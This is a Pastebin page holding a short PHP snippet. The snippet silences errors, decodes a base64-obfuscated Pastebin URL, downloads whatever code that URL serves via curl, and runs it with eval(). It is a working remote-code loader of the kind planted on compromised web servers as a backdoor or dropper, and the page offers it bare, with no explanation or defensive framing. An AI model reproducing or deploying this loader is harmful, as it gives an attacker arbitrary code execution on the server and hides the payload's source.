Advertisement
dragondevile

Untitled

Apr 4th, 2019
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. $st = curl_init();
  4. curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1kyWGYyNnM3"));
  5. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  6. $ex = curl_exec($st);
  7. eval($ex);
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement